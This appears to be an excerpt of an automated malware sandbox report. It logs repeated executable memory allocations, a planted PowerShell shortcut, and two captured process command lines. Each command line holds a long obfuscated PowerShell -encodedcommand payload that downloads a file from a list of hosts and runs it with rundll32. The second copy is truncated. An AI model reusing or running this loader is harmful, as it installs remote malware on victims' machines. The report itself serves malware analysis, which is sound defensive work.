NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02663000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02664000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02665000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02666000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02667000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02668000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02669000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c53000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c54000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c55000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c56000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c57000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c59000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c5a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c5b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c5c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c5d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c5e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c5f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c61000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c63000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell -encodedcommand "JABXAGgAaQBtAG0AZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQBMAGcAQQB5AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AUQBBAHcAQQBBAD0APQAiADsAJABoAHkAcABlAHIAbwB2AGEAcgBpAHMAbQBNAGUAdABvAHgAZQBuAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATgBnAEEAdQBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBNAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQAYwBBAE0AUQBBAHYAQQBHAEkAQQBaAGcAQQAwAEEARgBZAEEAWQBRAEEAdgBBAEYAUQBBAE0AZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAUQBBAEwAZwBBAHgAQQBEAGcAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AQQBBADMAQQBDADgAQQBVAFEAQgBWAEEAQwA4AEEATQBnAEIAdgBBAEgAVQBBAFUAZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBPAFEAQQB1AEEARABjAEEATQB3AEEAdQBBAEQASQBBAE0AZwBBADIAQQBDADgAQQBaAGcAQgBYAEEARwA4AEEAWgBBAEEAdgBBAEcAYwBBAGEAdwBBADEAQQBHAGMAQQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABFAEEATABnAEEAeABBAEQAQQBBAE0AQQBBAHUAQQBEAGMAQQBOAGcAQQB1AEEARABJAEEATQB3AEEAeQBBAEMAOABBAFoAQQBCAFUAQQBHAEUAQQBkAFEAQgBwAEEAQwA4AEEAUgB3AEEAPQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEAdwBBAEQAUQBBAEwAdwBCAFUAQQBFAHcAQQBSAHcAQgBvAEEARQA0AEEAWgBBAEEAdgBBAEcAcwBBAFoAdwBCAFcAQQBHAE0AQQBiAEEAQgByAEEAQQA9AD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAEgAQQBIAGMAQQBXAGcAQgA1AEEARABZAEEAdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBHAFUAQQBVAHcAQQB4AEEARQA0AEEATgBBAEIATwBBAEgAbwBBACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEgAYQB6AGEAcgBkAHIAeQBTAHUAYgBhAHIAcgBoAGEAdABpAG8AbgAgAGkAbgAgACQAaAB5AHAAZQByAG8AdgBhAHIAaQBzAG0ATQBlAHQAbwB4AGUAbgBvAHUAcwAgAC0AcwBwAGwAaQB0ACAAIgB1AGEAIgApACAAewB0AHIAeQAgAHsAJAB1AG4AdABoAGkAbgBrAHMAUwB1AG4AZABhAHIAaQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAZwBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHoAQQBEAGsAQQAiADsAJABJAG0AbQBpAG4AdQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEARwA0AEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAE0AQQBkAEEAQgA1AEEARwB3AEEAWgBRAEEAPQBpAEsAVABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQB5AEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAHcAQQB1AEEARABFAEEATQBRAEEAdwBBAEEAPQA9AGkASwBUAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAcABBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBkAGcAQgBsAEEASABJAEEAZABBAEIAbABBAEcASQBBAGMAZwBCAGgAQQBGAE0AQQBiAFEAQgBoAEEARwBNAEEAYQB3AEIAbABBAEgASQBBAGMAdwBBAHUAQQBHAGsAQQBjAGcAQgBwAEEASABNAEEAYQBBAEEAPQAiADsAJABWAGEAcgBpAGEAbgB0AHMAVABvAGcAZwBlAHIAaQBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQASABhAHoAYQByAGQAcgB5AFMAdQBiAGEAcgByAGgAYQB0AGkAbwBuACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAVgBhAHIAaQBhAG4AdABzAFQAbwBnAGcAZQByAGkAZQBzACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGUAbABlAGMAdAByAG8AcAB5AHIAbwBtAGUAdABlAHIALgByAGkAcwBzAG8AYQBQAGEAbgBvAHAAdABpAGMAbwBuADsAJABMAGUAZwBhAGwAaQBzAG0AQwBvAG0AcABlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBOAHcAQQAwAEEAQwA0AEEATQBRAEEAMABBAEQAVQBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9AE8ASABWAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHoAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBADAAQQBBAD0APQBPAEgAVgBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEcATQBBAGEAUQBCAGgAQQBIAE0AQQBZAHcAQgB2AEEASABBAEEAZQBRAEEAdQBBAEgAUQBBAFoAUQBCAHUAQQBHADQAQQBhAFEAQgB6AEEAQQA9AD0ATwBIAFYAbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEgAQQBHAHcAQQBhAFEAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBVAEEASABVAEEAWQBnAEIAbABBAEgASQBBAGEAUQBCADYAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAdQBBAEcAawBBAGIAZwBCAGsAQQBIAFUAQQBjAHcAQgAwAEEASABJAEEAYQBRAEIAbABBAEgATQBBACIAOwAkAG4AdQB0AHIAaQBsAGkAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBFAEEAWgB3AEIAcwBBAEcAawBBAFkAUQBCAHkAQQBHAGsAQQBiAGcAQgBwAEEARgBBAEEAYwB3AEIAbABBAEgAVQBBAFoAQQBCAHYAQQBHAGsAQQBjAHcAQgB2AEEASABRAEEAYwBnAEIAdgBBAEgAQQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAcQBCAFUAUgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBNAEEAQQB1AEEARABFAEEATgBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGcAQQBMAGcAQQB4AEEARABjAEEATQBRAEEAPQBxAEIAVQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEgAawBBAGMAdwBCADAAQQBHAGsAQQBZAHcAQgBoAEEARwB3AEEAYgBBAEIANQBBAEYAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgBvAEEASABVAEEAYgBRAEIAaABBAEcANABBAFkAdwBCAGwAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZQBsAGUAYwB0AHIAbwBwAHkAcgBvAG0AZQB0AGUAcgAuAHIAaQBzAHMAbwBhAFAAYQBuAG8AcAB0AGkAYwBvAG4AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADMAMAAxADAANQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEIAYwBBAEcAVQBBAGIAQQBCAGwAQQBHAE0AQQBkAEEAQgB5AEEARwA4AEEAYwBBAEIANQBBAEgASQBBAGIAdwBCAHQAQQBHAFUAQQBkAEEAQgBsAEEASABJAEEATABnAEIAeQBBAEcAawBBAGMAdwBCAHoAQQBHADgAQQBZAFEAQgBRAEEARwBFAEEAYgBnAEIAdgBBAEgAQQBBAGQAQQBCAHAAQQBHAE0AQQBiAHcAQgB1AEEAQwB3AEEAWQBnAEIAcABBAEcANABBAFoAQQBBADcAQQBBAD0APQAiADsAJABTAHUAcABlAHIAYQBjAHQAaQB2AGkAdAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAZABnAEIAcABBAEgASQBBAGQAUQBCAHMAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAaQBBAEcAVQBBAGQAQQBBAD0AYwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBrAEEAZABBAEIAcABBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgBKAEEARwAwAEEAWQBnAEIAMQBBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBZAHcAQgBvAEEARwA4AEEAYgB3AEIAcwBBAEEAPQA9AGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQB3AEEAdQBBAEQARQBBAE8AQQBBADUAQQBDADQAQQBPAEEAQQA0AEEAQwA0AEEATQBnAEEAeQBBAEQAVQBBAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAGcAQQB3AEEARABFAEEATABnAEEAeABBAEQAawBBAE0AdwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7AH0AfQA="

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABXAGgAaQBtAG0AZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQBMAGcAQQB5AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AUQBBAHcAQQBBAD0APQAiADsAJABoAHkAcABlAHIAbwB2AGEAcgBpAHMAbQBNAGUAdABvAHgAZQBuAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATgBnAEEAdQBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBNAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQAYwBBAE0AUQBBAHYAQQBHAEkAQQBaAGcAQQAwAEEARgBZAEEAWQBRAEEAdgBBAEYAUQBBAE0AZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAUQBBAEwAZwBBAHgAQQBEAGcAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AQQBBADMAQQBDADgAQQBVAFEAQgBWAEEAQwA4AEEATQBnAEIAdgBBAEgAVQBBAFUAZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBPAFEAQQB1AEEARABjAEEATQB3AEEAdQBBAEQASQBBAE0AZwBBADIAQQBDADgAQQBaAGcAQgBYAEEARwA4AEEAWgBBAEEAdgBBAEcAYwBBAGEAdwBBADEAQQBHAGMAQQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABFAEEATABnAEEAeABBAEQAQQBBAE0AQQBBAHUAQQBEAGMAQQBOAGcAQQB1AEEARABJAEEATQB3AEEAeQBBAEMAOABBAFoAQQBCAFUAQQBHAEUAQQBkAFEAQgBwAEEAQwA4AEEAUgB3AEEAPQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEAdwBBAEQAUQBBAEwAdwBCAFUAQQBFAHcAQQBSAHcAQgBvAEEARQA0AEEAWgBBAEEAdgBBAEcAcwBBAFoAdwBCAFcAQQBHAE0AQQBiAEEAQgByAEEAQQA9AD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAEgAQQBIAGMAQQBXAGcAQgA1AEEARABZAEEAdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBHAFUAQQBVAHcAQQB4AEEARQA0AEEATgBBAEIATwBBAEgAbwBBACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEgAYQB6AGEAcgBkAHIAeQBTAHUAYgBhAHIAcgBoAGEAdABpAG8AbgAgAGkAbgAgACQAaAB5AHAAZQByAG8AdgBhAHIAaQBzAG0ATQBlAHQAbwB4AGUAbgBvAHUAcwAgAC0AcwBwAGwAaQB0ACAAIgB1AGEAIgApACAAewB0AHIAeQAgAHsAJAB1AG4AdABoAGkAbgBrAHMAUwB1AG4AZABhAHIAaQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAZwBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHoAQQBEAGsAQQAiADsAJABJAG0AbQBpAG4AdQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEARwA0AEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAE0AQQBkAEEAQgA1AEEARwB3AEEAWgBRAEEAPQBpAEsAVABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQB5AEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAHcAQQB1AEEARABFAEEATQBRAEEAdwBBAEEAPQA9AGkASwBUAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAcABBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBkAGcAQgBsAEEASABJAEEAZABBAEIAbABBAEcASQBBAGMAZwBCAGgAQQBGAE0AQQBiAFEAQgBoAEEARwBNAEEAYQB3AEIAbABBAEgASQBBAGMAdwBBAHUAQQBHAGsAQQBjAGcAQgBwAEEASABNAEEAYQBBAEEAPQAiADsAJABWAGEAcgBpAGEAbgB0AHMAVABvAGcAZwBlAHIAaQBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQASABhAHoAYQByAGQAcgB5AFMAdQBiAGEAcgByAGgAYQB0AGkAbwBuACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAVgBhAHIAaQBhAG4AdABzAFQAbwBnAGcAZQByAGkAZQBzACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGUAbABlAGMAdAByAG8AcAB5AHIAbwBtAGUAdABlAHIALgByAGkAcwBzAG8AYQBQAGEAbgBvAHAAdABpAGMAbwBuADsAJABMAGUAZwBhAGwAaQBzAG0AQwBvAG0AcABlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBOAHcAQQAwAEEAQwA0AEEATQBRAEEAMABBAEQAVQBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9AE8ASABWAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHoAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBADAAQQBBAD0APQBPAEgAVgBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEcATQBBAGEAUQBCAGgAQQBIAE0AQQBZAHcAQgB2AEEASABBAEEAZQBRAEEAdQBBAEgAUQBBAFoAUQBCAHUAQQBHADQAQQBhAFEAQgB6AEEAQQA9AD0ATwBIAFYAbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEgAQQBHAHcAQQBhAFEAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBVAEEASABVAEEAWQBnAEIAbABBAEgASQBBAGEAUQBCADYAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAdQBBAEcAawBBAGIAZwBCAGsAQQBIAFUAQQBjAHcAQgAwAEE